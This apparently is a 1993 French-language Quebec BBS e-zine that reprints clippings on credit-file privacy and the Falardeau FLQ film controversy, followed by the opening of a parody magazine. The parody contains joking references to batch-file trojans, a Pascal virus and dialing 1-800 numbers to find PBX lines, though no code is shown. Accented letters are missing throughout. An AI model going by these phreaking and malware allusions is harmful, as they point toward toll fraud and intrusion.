payant les frais d'inscription de 60 $ exigs par
quifax, et qu'aucun contrle n'est exerc sur le
membership de cette entreprise".
Mme Rozon a ajout qu'il suffisait ensuite d'un coup
de tlphone pour transmettre le nom et l,adresse de
quelqu'un pour obtenir en cinq minutes son dossier de
crdit et 24 heures plus tard son exprience bancaire.
"Toutes ces informations pouvaient nous tre transmises
sans le consentement de cette personne et sans qu'elle le
sache", soutient-elle.
Elle a dit s'tonner
la lecture du projet de loi
que les agents de renseignements personnels obtiennent si
facilement des autorisations pour exercer leurs
activits. "Aucun droit payable, aucun contrle quand
leur comptence, et quand
leur capacit
administrer
leurs entreprises", a-t-elle dplor, suggrant un
encadrement cohrent des pratiques des agents.
Les ACEF s'inquitent que les recours mis
la
disposition des consommateurs "soient minimes, tout comme
les sanctions imposables aux entreprises".
"Le consommateur doit savoir qu'on recueille des
renseignements, qui les recueille et pourquoi et qui les
dtient. La loi doit aussi assurer que les renseignements
recueillis sont indispensables et qu'ils servent
uniquement
des fins prcises et pr-tablies, que ces
renseignements sont recueillis
des fins et par des
moyens lgaux et loyaux. Et le consommateur doit
conserver un contrle sur les informations qui le
concernent, de mme qu'il doit avoir l'assurance que ces
informations sont dtruites lorsqu'elles ne sont plus
indispensables
un dossier", a propos la directrice
d'ACEF-Centre.
La FNACQ et l'ACEF-Centre ont soumis un train de 70
recommandations
la commission.
- 30 -
Leeched from LE SOLEIL - 25 fvrier 1993
ETRE DISSIDENT
par
Jacques Gagn
"La libert, c'est un bien grand mot. Les artistes,
les rvolutionnaires et les vrais chrtiens en vivent et
en meurent".
Simonne Monet-Chartrand,
Journal intime, 1978
Le droit
la dissidence est-il reconnu dans une
socit dmocratique comme la ntre? Les individus
militant dans des organisations politiques peuvent-ils
esprer exprimer leurs convictions personnelles sans tre
esclaves de la ligne orthodoxe de leur parti et sans
craindre constamment d'y tre expulss, sanctionns d'une
position originale et non partisane?
Ce droit
la dissidence est, implicitement, prvu
l'article 7 de la Charte canadienne des droits et
liberts, laquelle nonce que "chacun a droit
la
libert de sa personne..." Les objecteurs de conscience
font appel
la libert de conscience et de religion en
vertu de l'article 2 de la mme charte. La magistrature
y dcouvre quotidiennement la source de son inspiration
et de son renouvellement.
La Commission-Jeunesse du Parti Libral,
son
congrs des 6 et 7 fvrier dernier, nous a livr un
spectacle navrant en rvlant la docilit de jeunes de
18-20 ans
l'gard d'une philosophie politique dessine
par leurs ans et leur proposant, comme seul idal, la
voie de la raisonnabilit.
Pourtant, l'essentiel de la jeunesse se situe dans
la passion et l'intransigeance en se mfiant des
comportements grgaires. Toute vellit pour le
compromis,
cet ge, risque de se traduire tt ou tard
par une sclrose de la pense et de l'action, strilisant
d'avance tout bain de jouvence.
Il n'est pas demand
tous les jeunes d'emprunter
le profil rvolutionnaire. La rflexion, en exergue, de
madame Simonne Monet-Chartrand le laisse sous-entendre.
Mais tous les jeunes, dignes de ce nom, devraient pouvoir
tmoigner en y substituant le vocable de contestataire.
La contestation est susceptible de renfermer toutes les
aspirations d'une jeunesse fougueuse dans un projet de
socit exempt de toute mdiocrit.
- 30 -
Leeched from LA PRESSE - Lundi 22 fvrier 1993
FALARDEAU DFEND SON FILM SUR OCTOBRE 70,
QU'IL DIT "FIDELE A L'HISTOIRE"
par
Gilles Paquin
Avant mme d'avoir tourn les premires images de son
film OCTOBRE, le cinaste Pierre Falardeau a t accus
hier de chercher
glorifier le FLQ avec des fonds
fdraux.
Selon le snateur libral Philip Gigantes, le
scnario de Falardeau prsente les assassins de Pierre
Laporte comme des personnages "sympathiques" alors qu'ils
ne l'taient pas. L'tat fdral doit refuser de financer
un tel projet.
"Mon objection principale
l'gard de ce film,
c'est qu'il met des mots dans la bouche de Pierre
Laporte, des choses pouvantables, alors qu'il n'est pas
ici pour se dfendre", a dclar M. Gigantes
La Presse.
Le projet du cinaste Pierre Falardeau raconte
l'enlvement et la mort de l'ancien ministre du Travail
Pierre Laporte, en octobre 1970. Il repose sur les
rapports de diffrentes commissions d'enqute et sur le
livre POUR EN FINIR AVEC OCTOBRE, de Francis Simard, un
des ravisseurs.
Le livre est paru chez Stank, en 1982, et l'Office
national du film a pay 9 000$, en 1984, pour acqurir
les droits d'auteur en vue d'en tirer un film. Le
manuscrit dort sur les tablettes depuis, et falardeau
s'en est inspir pour crire son propre scnario,
OCTOBRE. Tlfilm Canada a dj
vers 50 000$
Falardeau
pour assurer la bonne marche de son oeuvre.
"Le scnario ne travestit aucunement les faits; il
est tout
fait fidle
l'histoire. Le condamner
l'avance, c'est refuser de regarder la ralit en face",
a comment le ralisateur, hier.
Selon Pierre Falardeau, le snateur Gigantes sait
trs bien que tous les films produits au Canada comptent
sur le financement des organismes publics tels que
Tlfilm, l'ONF et la SOGIC. Priver une production de ces
sources revient
imposer une censure de fait, dit-il.
"Je n'ai aucune objection
ce que M. falardeau
fasse son film avec des fonds privs. Je ne propose pas
d'tablir la censure, mais il y a des sujets que le
gouvernement fdral n'a pas
subventionner" rplique
Gigantes.
Pour Falardeau, le peuple du Qubec et celui du
Canada ont le droit de savoir ce qui s'est pass pour
dcider ensuite librement ce qu'ils doivent en penser.
"Il n'est pas ncessaire qu'un politicien vienne
dcider
leur place", dit-il.
"Quand les gens verront ce film, je ne crois pas
qu'ils applaudiront
la mort de Laporte. Il s'agit d'un
tmoignage, tir de nombreuses sources, expliquant
comment les choses se sont passes sur la rue Armstrong
(
St-Hubert, lieu de la mort du ministre)", affirme
Falardeau.
C'est prcisment ce qui irrite Gigantes puisque,
dit-il, les seuls tmoins sont les responsables de la
mort de Laporte. A ses yeux, ont permet ainsi aux
assassins du ministre de faire de l'argent avec leur
crime.
"Cet pisode de notre histoire nous interpelle
encore et personne ne reste froid devant le scnario,
mais ce n'est pas une raison pour l'occulter", soutient
Falardeau.
"Je n'ai pas entendu la voix de M. Gigantes lorsque
la CBC a tourn une srie tlvise sur la Crise
d'octobre, ou encore lorsque Robin Spry a fait un film
sur le mme sujet avec des fonds de l'ONF", dit-il.
Nomm au Snat par Pierre Trudeau, Gigantes dit
qu'on le qualifie souvent de "trudeaucrate" parce qu'il
a t adjoint spcial de l'ancien premier ministre, mais
il soutient qu'il n'accepterait pas plus de financer un
film sur le caporal Denis Lortie (auteur d'une fusillade
mortelle
l'Assemble nationale) ou sur la pornographie.
Une comparaison que Falardeau juge tordue puisque,
dit-il, les gens du FLQ taient des rvolutionnaires et
il appartient
chacun de nous de juger si ce qu'ils ont
fait tait naf. Lui-mme a tranch en plaant en
pigraphe la citation d'Albert Camus: "Ncessaire et
injustifiable."
- 30 -
Leeched from LE DEVOIR - Mardi 23 fvrier 1993
Financement par Tlfilm
FALARDEAU COMME LES AUTRES!
par
Paule des Rivires
Tlfilm jugera le scnario du cinaste Pierre falardeau
sur le FLQ selon les mmes critres que tous les autres
projets qui lui seront soumis, soit sur sa qualit et son
originalit. Si le film rpond aux conditions de
l'entreprise fdrale, il sera subventionn. Sinon, il
devra aller chercher de l'aide ailleurs.
Voil
les commentaires faits hier
Tlfilm aprs
qu'un snateur libral, Philippe Gigantes, eut dnonc le
projet du film, qui selon lui glorifie le FLQ. Le
snateur a aussi dnonc l'entreprise fdrale Tlfilm
Canada qui a dj
accord 50 000$
Falardeau pour le
dveloppement du projet. Il reste que la vraie dcision,
celle de soutenir la production du long mtrage projet,
ne viendra que dans deux mois.
"Nous ne sommes naturellement pas immuniss contre
les commentaires. Mais il s'agit d'un film de fiction et
nous le jugerons comme tel en regardant le scnario, les
projets de mise en march et de distribution, la
structure financire de la compagnie", dclarait hier un
porte-parole de Tlfilm.
Falardeau n'est pas un nouveau venu
Tlfilm. Il
a reu des fonds pour deux de ses films prcdents, LE
PARTY, dont l'action se droulait dans un pnitencier, et
LE STEAK, sur la vie du boxeur Gaetan Hart. Pour le
scnario du film projet, M. Falardeau s'est inspir du
livre POUR EN FINIR AVEC OCTOBRE de Francis Simard, un
des ravisseurs. Le ralisateur estime pour sa part que
condamner son film
l'avance quivaut
un refus de voir
la ralit en face.
- 30 -
[Blitz - Falardeau a aussi crit et ralis votre film
prfr et le mien: ELVIS GRATTON... Il faudrait bien que
NPC fasse une entrevue avec lui un jour... Tous les films
de Falardeau, en fait (et ceux qui ont aussi vu LE PARTY,
un autre film bas sur le bouquin d'un autre ex-
felquiste, sauront de quoi je veux parler), tous ses
films sont autant de couteaux bien affts qui tranchent
dans la connerie quotidienne. A quand un film sur les
snateurs, Pierre? ;-)
En passant, ce fameux Gigantes, aviez-vous dj
entendu
parler de lui? Et Della Noce? Comment a se fait que la
politique attire autant de crtins? Des mecs qui, tout
coup, se rveillent et se disent: "Tiens! Je devrais me
faire un nom, moi-l
!" Parce que ce n'est pas autre chose
que leur quinze minutes de gloire qu'ils cherchent, ces
crtins. Et plutt que de les gagner en faisant passer
une loi dans le sens du monde, ou en votant un budget
spcial pour rouvrir Dernier Recours
Montral, bref,
en mettant leurs gros culs grassement pays au service du
peuple, ils choisissent plutt de se faire un nom en
cassant du petit et de l'impopulaire. Della Noce et sa
ligne de dlation, Gigantes et sa censure tatise: mme
combat! Un petit test: nommez-moi le twit qui est arriv
avec l'ide que les casinos, a allait rgler tous les
problmes de notre conomie...
Pourquoi? Pourquoi? Pourquoi?
Pourquoi tant de dmagogie et de crtinisme bon teint
chez nos dcideurs?
Remarquez, c'est probablement le propre des pleutres et
des gens sans imagination d'essayer de faire son pain sur
le dos des crateurs.
Ca s'appelle du vampirisme.
Ce sont des profiteurs.
Merde, j'ai dj
utilis cette expression-l
quelque
part, mais o? Vampirisme, profiteur, voyons, a va me
revenir... AH! Je sais! Une lettre que j'ai adresse au
crateur de ControlBreak, qui essaie de relancer son mag
moribond en y ajoutant une section "d'opinions" (j'aime
a quand quelqu'un pervertit les mots pour leur enlever
leur sens: un BNFICIAIRE de l'aide sociale, par
exemple: fait-on vraiment des bnfices avec le B.S? H!
Y est-y ben, le gars, il bnficie de l'aide sociale!),
une section de rag ('scuzez d'tre aussi direct) sur NPC.
Mais ceci est une autre histoire...]
Leeched from LE JOURNAL BELL - 1er fvrier 93
BRAVO!
Une fois de plus, notre rendement d'quipe a dpass
le seuil de 100%. Il atteint cette fois-ci 110%, malgr
une anne pour le moins difficile.
Pour la premire fois, tous les employs recevront
la prime d'quipe. Elle tait jusque l
rserve au
personnel cadre. Une brochure expliquant le calcul de la
prime selon les divers niveaux d'emploi sera envoye vers
la mi-fvrier. Les employs recevront leur chque durant
la mme priode.
- 30 -
Blitz says: Une prime pour tout le monde! De toute faon,
on va majorer le taux de base de ces cochons de payants
de 50 %! C'est nous les plus crosseurs, c'est nous les
plus BELL! En passant, qu'ont en commun les gens de Bell
et les pirates amricains? Voir ce qui suit pour la
rponse...
Leeched from LE JOURNAL BELL vol. 28 #22 - 30 novembre 92
PETITES ANNONCES
Vhicules
Jeep Comanche Pioneer, 1988, 2x4, 120 000km, 5 vitesses,
6 cyl, 4 l., CB, phares de brouillard, toile, 7 000$.
514-649-5128
- 30 -
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
LA JEEP VIENT AVEC UN CELLULAIRE
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
FICTION ET COMPAGNIE
NPShit
par Dynamix
Intro par Blitzkreig
Hum... Qu'avons-nous l
? Un magazine de petits rigolos, une parodie qui
vient de paratre, NPShit! Qu'est-ce que ce texte fait dans la section
FICTION ET COMPAGNIE, me dites-vous? C'est que cette oeuvre magnifique
tient tout de mme plus de la fiction que de la ralit. C'est le propre
de toute satire, non? Dans la grande tradition du National Lampoon (pour
ceux qui sont au fait de la culture amricaine), quelques clowns du 418
se sont fendus d'une caricature de NPC (le mensuel). Il parait que
l'imitation est la plus grande forme de flatterie, la plus sincre, en
tous les cas. Les gars, c'est trop!
Le rsultat est, le mot n'est pas trop fort, FORMIDABLE! Le matre
penser de ce groupe, David Turgeon, et moi-mme, avons eu une longue
conversation tlphonique (on vous fera un .VOC
un moment donn), o je
lui ai fait part de mon amusement. Il a t tonn de ma raction,
croyant peut-tre que nous prendrions la mouche. Rien n'est plus faux,
l'ai-je assur.
Personnellement (et je sais qu'Atreid et TSP partagent
tout le
moins le mme avis que moi), je ne pourrais pas tre, d'aucune
faon, en colre contre quelqu'un qui nous offre sa "dissidence"
avec un humour aussi brillant! Une discussion fort civilise s'en
est ensuivie, o j'ai pu, je l'espre, dissiper certaines
mconceptions qu'entretenait [DynamiX] notre gard.
David m'a racont que a lui a pris deux semaines pour crire NPCShit,
qu'il est responsable de la quasi-totalit des textes, bien que certaines
des ides aient t suggres par des sous-fifres (non, j'ai pas dit
fifs!).
Encore une fois, bravo
David! Le travail de David est d'autant plus
apprciable qu'il n'a lu, me disait-il, que le numro 1 et une
partie du numro 3. Son imagination et sa crativit ont fait le
reste. Du beau travail!
Certaines personnes vont cependant s'tonner de notre dcision de
publier cette caricature dans NPC. C'est pourtant bien
simple, les aminches:
1) Nous sommes les premiers, nous de NPC,
ne pas hsiter
pointer du doigt "l'empereur qui n'a pas de vtements" (un conte
pour enfants: vous connaissez?). On serait bien malvenus d'en
vouloir
des gens qui nous indiquent d'une manire aussi joviale
que notre pantalon commence
glisser...
2) La dissidence de David Turgeon est exprime avec humour et
esprit. Plutt que de jouer aux vierges offenses comme certains,
il a utilis la voie de la parodie, dans la grande tradition du
National Lampoon. Mais je me rpte, l
, non?
3) NPShit est une caricature... Laissez-moi vous entretenir,
l'espace de quelques lignes, sur ce qu'est exactement l'art du
caricaturiste. Certains d'entre vous ont peut-tre cout le POINT
qui prcdait, je crois, la diffusion du plus rcent BYE BYE. Un
des invits, justement, tait Serge Chapleau, caricaturiste bien
connu. Il nous racontait, dans ses termes, que la caricature,
c'tait tout d'abord l'opportunit d'AMPLIFIER les caractristiques
du sujet vis. Exemple: tous les caricaturistes des mdias
AUGMENTENT le menton de Brian Mulroney de faon dmesure dans
leurs dessins. Mulroney, qui a dj
un menton avanc, se retrouve
dans ces dessins avec une face en forme de quartier de lune. Ces
mmes "ditorialistes" du dessin reproduisent Robert Bourassa avec
un GRAAAAAAAAAAAAAAAAAND nez,
la faon de Pinocchio. De mme,
David Turgeon, qui a manifestement en lui le "germe" des grands
caricaturistes, a amplifi les tics et les travers des auteurs de
NPC. Ben oui, on a des tics et des travers... nous sommes humains
nous aussi... mais on tente de corriger a, et on va tenter
davantage, surtout sous l'impulsion d'une critique aussi
humoristique. David et ses assistants ont ici trouv une faon
originale de nous pousser
nous dpasser. Ils ont compris que ce
n'est pas en nous rentrant dans les plumes avec la btise pour
seule arme qu'on peut nous convaincre de changer...
4) Des grands mensuels ou hebdos comme TIME, NEWSWEEK et PLAYBOY ont
attendu parfois vingt ans avant d'tre spooffs, lampoons, parodis. Et
nous, en trois numros, on a dj
atteint ce statut? On ne portera
bientt plus par terre, si a continue. Il va falloir faire attention.
Tout ce que je souhaite, c'est que le prochain XJAA (dont nous avons
parl dans le NPC #3), cens "attaquer" NPC soit fait avec autant
d'humour... En parlant de XJAA, saviez-vous que deux parodies de ce
magazine, AJAX, circule sur les babs, alors que l'original n'est mme pas
encore sorti? Il faut le faire, non?
Parodier un mag qui n'existe pas encore: chapeau! Le parodier DEUX FOIS:
nous sommes au bord du dlire! Pour ceux qui dsireraient jeter un coup
d'oeil
l'oeuvre, nous les incluons dans nos PHUN WEEK ONLINE
(disponibles sur tous les babs 418 ayant une section NPC). Je tiens
signaler, pour clore cet apart sur XJAA, que les auteurs de cette
parodie ne sont pas de NPC.
Tout va tellement vite, je vous dis! Si jamais le travail de NPC
n'aura eu qu'UN SEUL effet bnfique sur la rgion, se sera bien
d'avoir rveill les auteurs et les crateurs en vous! Un dernier
mot, avant de vous prsenter NPShit: ils ont mme pouss la
ressemblance jusqu'
imiter le demo de TSP dans NPC #1. Allez
downloader dans les sections NPC des babs autoriss le demo de NPShit
aprs votre lecture. David, un homme-orchestre qui a tous les talents,
dont des dons certains de programmeur (il a mme ralis certaines doors
qui circulent sur quelques babs
Qubec), a fait une job du tonnerre
avec ce demo (il faut dire qu'il n'est pas peu fier de son travail, et
avec raison).
Grce
lui, votre journal prfr est plus gros de 80k!
Place
David Turgeon et
son oeuvre, NPShit!
ÛÛÜ ÜÜÜÜ ÜÜ
ÛÛÛÛÛÛÜ ÜÛÛÜ ßÛÛÛÛÜÜÜ ÜÜÛÛÛÛÛÜ ÜÜÜÜÜÛ|
ÛÛÛÛ ÛÛÛ|Û ÛÛÛ ÛÛÛßßßÛÛÛÜ ÛÛÛÛßßßßÛÛ ÛÛ ßßßßßßßÛÛÛÜ
ÛÛÛÛ þÛÛ|ßÜþÛÛ| ÛÛÛ ÛÛÛÛ ÛÛÜ ÜÛÛß ÛÛÜÛÛÜ ÛÛ ÛÛ ßÛ
þÛÛÛ ÛÛÛ ß ÛÛÛ ÛÛÛ ÜÛÛßß ÜÜÜ ßÛÛÜ ÛÛß ßÛÛ ÛÛ ÛÛ Û
ÛÛÛÛÜÜÜÜ ÛÛÛÜÛÛÛ Ü ÛÛÛ ßß ÛÛÛÜ ÜÛÛ Ü ÛÛ ÛÛß Û| ÛÛ Üß
ßÛÛÛß ÜÛÛ|
ßßÛÛÛÛß ßÜÜ ÜÛß ßß þÛ
ßÜÜÛÛß ßß Û
ÛßÛ Û ÛßÛ Ûß ÛÜ Û ßßßßß ÛßÛ Û ÛßÛ Û ßßß Ûß Ûßß Û ßßß ÛÜ
Û Û Û ÛÜÛ Û Û ÛßÛ ÛÛ Ûß Û Û Û Û Û ÛßÛ Û Ûß ÛÜÜ ÛßÛ Û Û
Û ÛÜÛ ÜÜÜÜÜÜ ÛÜ Û Û ÛÜ Û Û ÛÜÛ Ûßß Û Û Û Û ÜÜÛ Û Û Û ÛÜ
ßßßß ÛÛÛßßßß ÛÛÛßßßß ÛÛÛ ßÛÛ ÛÛÛÛßß Ü ÛÛÛßÛÛ ÛÛßÛÛ Ü ÛÛÜ ÛÛ
ÛÛÛß ÜÜÜÜÛÛÛ ÜÜÜÜÛÛÛ ÛÛÛÛÜÛÛ ÛÛÛÜÜÛ ß ÛÛ ÜÛÛ ÛÛÜÛÛ ß ßßß ÛÛ
A P R E V i O U S L Y U N K N O W N C H i L D P L A Y
Ansi (c)Caillou Chanceux
ÉÍÍÍÍ[ NOTE IMPORTANTE ]ÍÍÄÄÄÄ
º
ºCe magazine comporte des scnes de violence et de stupidit, il est
ºdonc recommand
un auditoire adulte. (Des plans pour que personne
ºnous lise)
º
ºIl n'y a qu'un but vis par les auteurs, celui de mettre sur pied un
ºmagazine humoristique destin
faire rire leurs lecteurs.
º
ºBien qu'il y ait des ressemblances avec des personnes relles, nous ne
ºvoulons en aucun cas nuire
leurs rputations. (Mme pour Fairy Dst
ºqui lui, est vraiment stupide) Certaines insinuations sortent directement
ºde notre imagination, veuillez ne pas en tenir compte lorsque vous re-
ºviendrez
la ralit. (Lorsque vous aurez fini la lecture de ce recueil
ºstupide.)
º
ºNous aimerions donc que ce magazine soit pris avec un grain d'humour
ºpar les personnes concernes, ainsi que par les parents des enfants
ºdsobissants qui auront tout de mme lu nos textes.
º
º La direction. (Avouez que a fait srieux)
º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
NPShit Issue 4 Contents
by Barbara Bush
Dans ce numro:
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍþÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºSUJET ³AUTEUR º
º ³ º
ºContents ³Barbara Bush º
ºEdito ³Blitzcrest º
ºBravo du mois ³The Complete STaFF º
ºCourrier du lecteur ³The LECTEURS + the STAff º
ºComment changer de handle ³Dental Flush º
ºSHiT DRuGz: Plasticine ³Coaxial Karpette º
ºLe mot du mdium ³The mdium º
ºChronique mensuelle de prog³Peanut Butter º
ºProg avance: Faire un DEMO³Bloody Steak º
ºQu'est-ce qu'un ELITE ³Dental Flush º
ºDoS HACkS: Hacker une batch³BEEf BRoTH º
ºCrossing cenne machine ³Explosive Banana º
ºDo a BATCH FILE TROJAN ³Killer Ceiling Annihilatorº
ºComment gonfler un fichier ³Explosive Banana º
ºQuebec's Hackers: YANKUL ³Gelatine Butcher º
ºFlash NEWz ³OT/EB/NC º
ºAssembly: The Interrupt Z ³Socks Yogurt Eater º
ºLes BOARDS PUBLIX ³Fairy Compst º
ºTRUCS NPSHITIENS ³BBW/BB/TSN/Blitz/CC/Staff º
ºDifficult PROGS examples ³PCMaG º
ºChronique FICTION ³L'oGRe RuSSe º
ºDictionnaire de niaiseries ³Paleolithic Parking Lot º
ºCoded message ³The stillstaff º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍþÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Staff: þ Blitzcrest Contributors: þ Barbara Bush
þ Coaxial Karpette þ Le mdium
þ Peanut Butter þ Organic Terminology
þ Bloody Steak þ Null Character
þ Dental Flush þ Blackboard Warrior
þ BEEf BRoTH þ The Serial Number
þ Explosive Banana þ (c)Caillou Chanceux
þ Killer Ceiling Annihilator þ Yankul
þ Gelatine Butcher þ Atreid Bavtron
þ Socks Yogurt Eater þ Flour Rider
þ Fairy Compst þ Jigsaw Destroyer
þ L'oGRe RuSSe þ Paleolithic Parking Lot
Moyenne d'ge: 22 ......................Mois.
Greets: þ Barbara Bush parce que c'est la blonde
Blitzcrest pis que
Blitzcrest c'est le seul de la gang qui a russi
se pogner
une fille.
þ (c)Caillou Chanceux pour ses super beaux ansis.
þ Yankul pour nous avoir fait un prix d'ami pour la consulation.
þ Jigsaw Destroyer pour avoir fait le superbe NPSDEMO.EXE.
(Taboire qu'y programme ben ce gars-l
, j'en reviens pas!)
Dans le prochain numro:
Comment sortir de l'asile
Comment crosser une machine
gomme
D'autres shit drugz
Comment phreaker un 300 bauds sans modem
La commande ECHO
Comment faire
croire qu'on est capable de programmer
Quoi faire quand notre tte enfle trop
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
Edito par Blitzcrest
ÍþÍþÍþÍ
Bienvenue dans NPShit!
Nous sommes la nouvelle gnration des hots qui peuplent les
boards pirates. Et notre magazine NPShit sert
nous faire
connatre au public. De plus, il nous aidera
faire du cash vu
qu'on va bientt vous offrir des cours de BATCH FILES
domicile!
Enfin vous saurez comment utiliser les commandes ECHO et REM, et
vous vous retrouverez avec un paquet de batch files cres par
Loocif Hair!
Une spcification cependant! NPShit parle BILINGUE! Le monde
peuvent donc crire en franais, en anglais, ou mme en japonais
s'ils ont le code page pour! (Notez qu'en fait, le monde crit
pomal juste en franais... C'est vrai qu'ils ont juste un diplme
d'tudes primaires pour la plupart...)
Enfin... Si vous avez des ides, des suggestions, ou si vous
dcouvrez comment faire des doors en batch files, callez-nous!
Bientt on va avoir une VMB vu que le pre
Atreid Bavtron en
a une
son bureau!
Eeeeeh... Merci de toffer!
Blitzcrest
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
ÚÄÄ¿ ÚÄÄ¿ ÚÄÄ¿ ³ ³ ÚÄÄ¿
³ ³ ³ ³ ³ ³ ³ ³ ³ ³
ÃÄÄÙ ÃÄÄÙ ÃÄÄ´ ³ ³ ³ ³
ÃÄÄ¿ ÃÄÄ¿ ³ ³ ³ ³ ³ ³
³ ³ ³ ³ ³ ³ \ / ³ ³
ÀÄÄÙ ³ ³ ³ ³ \/ ÀÄÄÙ D U M O I S ! (ansi (c)Caillou Chanceux)
Nos flicitations
un membre du NPShit Staff, Fairy "Jordy" Compst,
pour le succs de sa chanson "Dur dur d'tre un bb".
The complete STaFF
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
-=þ COURRIER DU LECTEUR þ=-
------------------------------------------------------------------
Msg #: [175/186] Base: NPShit Support
Date : Sat 02 Jan 1992 10:27a Stat: Public
From : MR-COCIENT
To : NpShit Staff
Title: pbx
J'ai dialer 2 numeros dans le 1-800 et j'ai toujours pas de PBX. Est-ce
Normal?
salut
-----------------------------------
Bloody Steak rpond:
Ecoute, t'avais juste
suivre notre cours priv de 30$. C'est a qui arrive
quand on veut tout apprendre seul. A l'avenir fait affaire a des PROS.
Je peux te donner un petit conseil gratuitement:
essaye de dialer 4-5 autres numros, si tu en trouves toujours pas, c'est que
tu as vraiment pas de chance.
------------------------------------------------------------------
Msg #: [176/186] Base: NPShit Support
Date : Mon 04 Jan 1992 9:27p Stat: Public
From : >>Anonymous<<
To : NpShit Staff
Title: vIRUS EN pASCAL
Votre source de virus en pascal ne marche meme pas gang d'epais.
-----------------------------------
Bloody Steak rpond:
Ecoute plains-toi
celui qui l'a fait dans la version originale anglaise.
C'est pas de notre calice de faute si on a pogn une mauvaise T-File fake
christ-nous patience.
------------------------------------------------------------------
Msg #: [177/186] Base: NPShit Support
Date : Mon 04 Jan 1992 11:37p Stat: Public
From : MOST OF PEOPLE
To : NpShit Staff
Title: criss de tete
Vous etes juste des calices de tetes enfler dans NPShit s'tu vrai?
un credule
-----------------------------------
Bloody Steak rpond:
Ouin ben Eeeee... celui qui le dit celui qui l'est...
Atreid Bavtron rpond:
